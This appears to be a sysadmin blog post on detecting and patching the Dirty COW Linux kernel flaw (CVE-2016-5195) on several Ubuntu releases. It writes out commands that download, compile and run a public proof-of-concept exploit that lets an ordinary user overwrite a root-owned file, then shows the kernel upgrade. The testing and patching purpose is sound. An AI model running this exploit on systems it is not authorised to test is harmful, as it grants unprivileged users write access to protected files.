A serious bug has been detected recently in Linux kernel named Dirty COW (CVE-2016-5195). An unprivileged local user can use this flaw to gain write access in the system. The bug existed since around 2.6.22+ (release in 2007) and was fixed on Oct 18, 2016. Exploitation of this bug does not leave any trace or any log in the system so it’s difficult to find out what happen if something goes wrong.
The fix has been released and I already tested and fixed this bug in my system. You have to update your kernel to fix the problem.
Testing platform
I tested it in the following Ubuntu version:
12.04.2 LTS, Precise Pangolin. kernel version: Linux 3.5.0-23-generic x86_64 14.04.3 LTS, Trusty Tahr. kernel version: Linux 3.16.0-30-generic x86_64 16.04.1 LTS (Xenial Xerus). Kernel version: Linux 4.4.0-21-generic x86_64
How to detect
Lets see how to detect the flaw. The process is similar in Ubuntu 12.04, 14.04 and 16.04. First login to your system with an ordinary user and get the kernel version. To perform the test gcc should be installed in your system. Perform the following to get your system kernel version.
Ubuntu 12.04
imtiaz@labserver:~$ uname -mrs
Linux 3.5.0-23-generic x86_64
imtiaz@labserver:~$
Ubuntu 14.04
imtiaz@labserver:~$ uname -mrs
Linux 3.16.0-30-generic x86_64
imtiaz@labserver:~$
Ubuntu 16.04
imtiaz@labserver:~$ uname -mrs
Linux 4.4.0-21-generic x86_64
imtiaz@labserver:~$
Write down your kernel version. Now login as root and create a file like below. The process is similar in Ubuntu 12.04, 14.04 and 16.04.
imtiaz@labserver:~$ sudo -s
[sudo] password forimtiaz:
root@labserver:~#
root@labserver:~# echo Bug in linux kernel > bugfile
root@labserver:~# ls -l
total 4
-rw-r--r-- 1 root root 20 Oct 2518:23 bugfile
root@labserver:~#
A file has been created called “bugfile” and the content of the file is “Bug in linux kernel”. You may choose a different name and content for the file. Look at the permission and ownership of the file. it’s owned by root, so as an ordinary user it’s not possible to make changes in that file. Now exit form the root and be an ordinary user again. Now download a file from the below mention location. You need that file for performing the testing. Again the process is same in all mention Ubuntu versions.
imtiaz@labserver:~$ wget https://raw.githubusercontent.com/dirtycow/
dirtycow.github.io/master/dirtyc0w.c
A file called dirtyc0w.c will be downloaded in your system. Compile the file with the below command.
imtiaz@labserver:~$ gcc -pthread dirtyc0w.c -o dirtyc0w
After compiling you will get a new file called ditryc0w. Note that it’s an executable file.
imtiaz@labserver:~$ ls -l
total 24
-rw-r--r-- 1 root root 20 Oct 2521:03 bugfile
-rwxrwxr-x 1 imtiaz imtiaz 13448 Oct 2521:08 dirtyc0w
-rw-r--r-- 1 root root 2826 Oct 2521:03 dirtyc0w.c
imtiaz@labserver:~$
Now come to the main part. Run the file dirtyc0w. it take’s two parameters, one the file name which is going to be changed in our case, it’s “bugfile” and the second one is the string which will be replaced or add in that file (r000000000000000000). Run the file and wait for it to be finished.
imtiaz@labserver:~$ ./dirtyc0w bugfile r000000000000000000
mmap 7f3b052df000
madvise 0
procselfmem 1900000000
imtiaz@labserver:~$
You will see an output like above (nmap and procselfmem value may be different in your case). Now check the file named “bugfile” which we created earlier as root.
imtiaz@labserver:~$ cat bugfile
r000000000000000000
imtiaz@labserver:~$
The content of the file “Bug in linux kernel” is replaced by the string “r000000000000000000”. This is the bug. You can change the file which is owned by root without knowing the root password or you don’t need to be root to change the file. You can write any value in that file just provide the string which you want to write in that file as a 2nd parameter while running the dirtyc0w file.
How to fix
We detect that our system is effected now it’s time to fix it. The process is simple, but you need to do a system reboot. So if you have a downtime issue, then consider your time carefully. Before performing the following, please make a backup of your important file in that system or if you are in a VM world then you can make a snapshot of your current system. So if things go wrong after updating the kernel you can revert back to your original system. I can update my system kernel without any problem. The fix is simple, just update your system kernel as mention below.
Ubuntu 12.04and14.04
imtiaz@labserver:~$ sudo apt-get install linux-generic-lts-xenial
linux-image-generic-lts-xenial
Ubuntu 16.04
imtiaz@labserver:~$ sudo apt-get update && sudo apt-get dist-upgrade
After kernel update reboot your system. Now login to the system and check the kernel version. You will see the newly installed kernel version:
Ubuntu 12.04
imtiaz@labserver:~$ uname -mrs
Linux 3.5.0-54-generic x86_64
imtiaz@labserver:~$
Ubuntu 14.04 and16.04
imtiaz@labserver:~$ uname -mrs
Linux 4.4.0-45-generic x86_64
imtiaz@labserver:~$
Test the fix
Now perform the following steps:
Step 1: Login as an ordinary user and be root:
imtiaz@labserver:~$ sudo -s
[sudo] password forimtiaz:
root@labserver:~#
Step 2: Create a file. I use “cleanfile” as a name of the file and “After kernel update” as the content of the file. You can choose your own.
root@labserver:~# echo After kernel update > cleanfile
Step 3: Check the file permission. Note the file permission and ownership of the file named “cleanfile”. It’s root. sounds good.
root@labserver:~# ls -l
total 24
-rw-r--r-- 1 root root 20 Oct 25 2016 bugfile
-rw-r--r-- 1 root root 20 Oct 2513:16 cleanfile
-rwxrwxr-x 1 imtiaz imtiaz 9158 Oct 25 2016 dirtyc0w
-rw-rw-r-- 1 imtiaz imtiaz 2826 Oct 25 2016 dirtyc0w.c
root@labserver:~#
Step 4: Logout from root:
root@labserver:~# exit
exit
imtiaz@labserver:~$
Step 5: run the dirtyc0w file with 2 arguments file name and replace string:
imtiaz@labserver:~$ ./dirtyc0w cleanfile c0000000000000000000
mmap 7f17c88b4000
madvise 0
procselfmem 2000000000
imtiaz@labserver:~$
Step 6: Check the content of the file.
imtiaz@labserver:~$ cat cleanfile
After kernel update
imtiaz@labserver:~$
As you can see that the content of the file is not changed which actually is a normal behavior. In other words, you just fixed dirty COW issue in your system. Before finishing perform all the steps carefully and make a backup before performing.
If you enjoyed the post, please share it with your network and let me know your thoughts in the comments.
About the Author: Imtiaz is working in a financial organization in Bangladesh and having experience in system, network and security administration. Feel free to contact with him on LinkedIn or Twitter.